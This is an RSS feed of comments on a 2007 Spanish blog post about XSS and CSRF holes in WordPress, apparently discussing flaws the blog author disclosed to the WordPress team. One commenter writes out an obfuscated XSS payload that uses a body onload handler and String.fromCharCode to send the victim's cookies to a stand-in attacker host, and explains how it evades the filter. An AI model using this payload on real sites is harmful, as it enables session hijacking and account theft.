<?xml version="1.0" encoding="utf-8"?><rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
		>
<channel>
	<title>Comentarios en: WordPress, XSS y CSRF &#8211; Parte 2</title>
	<atom:link href="http://www.buayacorp.com/archivos/wordpress-xss-y-csrf-parte-2/feed/" rel="self" type="application/rss+xml" />
	<link>http://www.buayacorp.com/archivos/wordpress-xss-y-csrf-parte-2/</link>
	<description>Diseño y Programación</description>
	<lastBuildDate>Wed, 08 Feb 2012 16:34:31 +0000</lastBuildDate>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
	
	<item>
		<title>Por: &#187; Blog Archive &#187; Actualizacion Wordpress 2.1.3</title>
		<link>http://www.buayacorp.com/archivos/wordpress-xss-y-csrf-parte-2/#comment-10384</link>
		<dc:creator>&#187; Blog Archive &#187; Actualizacion Wordpress 2.1.3</dc:creator>
		<pubDate>Wed, 28 Mar 2007 18:14:12 +0000</pubDate>
		<guid isPermaLink="false">http://www.buayacorp.com/archivos/wordpress-xss-y-csrf-parte-2/#comment-10384</guid>
		<description>[...] Wordpress, XSS y CSRF - Parte 2 [...]</description>
		<content:encoded><![CDATA[<p>[...] WordPress, XSS y CSRF - Parte 2 [...]</p>
]]></content:encoded>
	</item>
	<item>
		<title>Por: g30rg3_x</title>
		<link>http://www.buayacorp.com/archivos/wordpress-xss-y-csrf-parte-2/#comment-10249</link>
		<dc:creator>g30rg3_x</dc:creator>
		<pubDate>Mon, 19 Mar 2007 17:51:49 +0000</pubDate>
		<guid isPermaLink="false">http://www.buayacorp.com/archivos/wordpress-xss-y-csrf-parte-2/#comment-10249</guid>
		<description>Bueno realmente lo intente meter dentro de ese tag [ code][ /code]
Pero siempre se filtra todo lo que entre directamente entre &quot;&lt;&quot; y &quot;&gt;&quot;, ahora (por que a la hora que vi tu quiz y lo respondi era bastante tarde aqui en mex :P) pues que ya tuve mas tiempo pude ver que tengo que meter esos caracteres como su Entidad HTML para evitar el filtrado.

Aqui te dejo lo considere mi respuesta a tu quiz...

[code]
.http://host/&quot;&gt;&lt;body onload=&quot;document.location=String.fromCharCode(104,116,116,112,58,47,47,119,119,119,46,119,101,98,45,100,101,108,45,97,116,97,99,97,110,116,101,46,99,111,109,47,114,111,98,97,95,99,111,111,107,105,101,115,46,112,104,112,63,97,61)%2Bdocument.cookie&quot;&gt;.php
[/code]

Saludos</description>
		<content:encoded><![CDATA[<p>Bueno realmente lo intente meter dentro de ese tag [ code][ /code]<br />
Pero siempre se filtra todo lo que entre directamente entre "&lt;" y "&gt;", ahora (por que a la hora que vi tu quiz y lo respondi era bastante tarde aqui en mex <img src='http://www.buayacorp.com/wp-includes/images/smilies/icon_razz.gif' alt=':P' class='wp-smiley' /> ) pues que ya tuve mas tiempo pude ver que tengo que meter esos caracteres como su Entidad HTML para evitar el filtrado.</p>
<p>Aqui te dejo lo considere mi respuesta a tu quiz...</p>
<div class="hiliter"><strong>code:</strong>
<pre class="code">&nbsp;
.&lt;a href=&quot;http:<span style="color: #808080; font-style: italic;">//host/&quot; rel=&quot;nofollow&quot;&gt;http://host/&lt;/a&gt;&quot;&gt;&lt;body onload=&quot;document.location=String.fromCharCode(104,116,116,112,58,47,47,119,119,119,46,119,101,98,45,100,101,108,45,97,116,97,99,97,110,116,101,46,99,111,109,47,114,111,98,97,95,99,111,111,107,105,101,115,46,112,104,112,63,97,61)%2Bdocument.cookie&quot;&gt;.php</span>
&nbsp;</pre>
</div>
<p>Saludos</p>
]]></content:encoded>
	</item>
	<item>
		<title>Por: Wordpress, XSS y CSRF - Final</title>
		<link>http://www.buayacorp.com/archivos/wordpress-xss-y-csrf-parte-2/#comment-10248</link>
		<dc:creator>Wordpress, XSS y CSRF - Final</dc:creator>
		<pubDate>Mon, 19 Mar 2007 13:05:13 +0000</pubDate>
		<guid isPermaLink="false">http://www.buayacorp.com/archivos/wordpress-xss-y-csrf-parte-2/#comment-10248</guid>
		<description>[...] Últimos comentarios Alex en: Wordpress, XSS y CSRF - Parte 2 [...]</description>
		<content:encoded><![CDATA[<p>[...] Últimos comentarios Alex en: WordPress, XSS y CSRF - Parte 2 [...]</p>
]]></content:encoded>
	</item>
	<item>
		<title>Por: alex</title>
		<link>http://www.buayacorp.com/archivos/wordpress-xss-y-csrf-parte-2/#comment-10247</link>
		<dc:creator>alex</dc:creator>
		<pubDate>Mon, 19 Mar 2007 12:16:36 +0000</pubDate>
		<guid isPermaLink="false">http://www.buayacorp.com/archivos/wordpress-xss-y-csrf-parte-2/#comment-10247</guid>
		<description>En efecto g30rg3_x, sólo es usar una etiqueta que no necesite cerrarse.

El ejemplo que envié al equipo de Wordpress es el siguiente, dependiendo de los permisos que tenga la &lt;em&gt;víctima&lt;/em&gt;, es posible sobreescribir los archivos del tema actual sin ser afectados por la protección contra ataques CSRF que ofrece Wordpress.
http://www.buayacorp.com/files/wordpress/wordpress-theme-exploit.txt

Saludos
PS. Si deseas poner código &quot;peligroso&quot;, puedes hacerlo usando las etiquetas [ code][ /code] (sin los espacios)</description>
		<content:encoded><![CDATA[<p>En efecto g30rg3_x, sólo es usar una etiqueta que no necesite cerrarse.</p>
<p>El ejemplo que envié al equipo de WordPress es el siguiente, dependiendo de los permisos que tenga la <em>víctima</em>, es posible sobreescribir los archivos del tema actual sin ser afectados por la protección contra ataques CSRF que ofrece WordPress.<br />
<a href="http://www.buayacorp.com/files/wordpress/wordpress-theme-exploit.txt" rel="nofollow">http://www.buayacorp.com/files/wordpress/wordpress-theme-exploit.txt</a></p>
<p>Saludos<br />
PS. Si deseas poner código "peligroso", puedes hacerlo usando las etiquetas [ code][ /code] (sin los espacios)</p>
]]></content:encoded>
	</item>
	<item>
		<title>Por: g30rg3_x</title>
		<link>http://www.buayacorp.com/archivos/wordpress-xss-y-csrf-parte-2/#comment-10246</link>
		<dc:creator>g30rg3_x</dc:creator>
		<pubDate>Mon, 19 Mar 2007 09:10:55 +0000</pubDate>
		<guid isPermaLink="false">http://www.buayacorp.com/archivos/wordpress-xss-y-csrf-parte-2/#comment-10246</guid>
		<description>Bueno es muy facil...
Realmente el chiste es que no usemos &quot;/&quot; y que todo termine como .php, lo ultimo es muy facil y el primero es un poquito (muy poquito) mas dificil, realmente usando algun tag que no se tenga que cerrar y puedes meter codigo &quot;malicioso&quot; lo pasas

Bueno tus website/filtros no me dejan pues poner mi respuesta de manera completa asi que la explicare...
Usamos el atributo onload del tag body, -asi como tu caso de meneame-, para evitar usar algun tag de cierre como lo tiene el tag script y claro para hacer que se mueva a otro sitio digamos la &quot;web-del-atacante.com&quot; donde lo espera un script en php que tome la variable por GET cookie para guardar la cookie procedente del website de la victima.
Ahora solo queda pues poner eso en lugar de XSS y terminarlo con .php para que se ejecute...

Para evitar el uso de &quot;/&quot; dentro de la cadena de url usamos el metodo fromCharCode de la clase String y asi podremos pasar bastante la proteccion...

Eso es todo, asi de simple y facil...

Saludos</description>
		<content:encoded><![CDATA[<p>Bueno es muy facil...<br />
Realmente el chiste es que no usemos "/" y que todo termine como .php, lo ultimo es muy facil y el primero es un poquito (muy poquito) mas dificil, realmente usando algun tag que no se tenga que cerrar y puedes meter codigo "malicioso" lo pasas</p>
<p>Bueno tus website/filtros no me dejan pues poner mi respuesta de manera completa asi que la explicare...<br />
Usamos el atributo onload del tag body, -asi como tu caso de meneame-, para evitar usar algun tag de cierre como lo tiene el tag script y claro para hacer que se mueva a otro sitio digamos la "web-del-atacante.com" donde lo espera un script en php que tome la variable por GET cookie para guardar la cookie procedente del website de la victima.<br />
Ahora solo queda pues poner eso en lugar de XSS y terminarlo con .php para que se ejecute...</p>
<p>Para evitar el uso de "/" dentro de la cadena de url usamos el metodo fromCharCode de la clase String y asi podremos pasar bastante la proteccion...</p>
<p>Eso es todo, asi de simple y facil...</p>
<p>Saludos</p>
]]></content:encoded>
	</item>
</channel>
</rss>

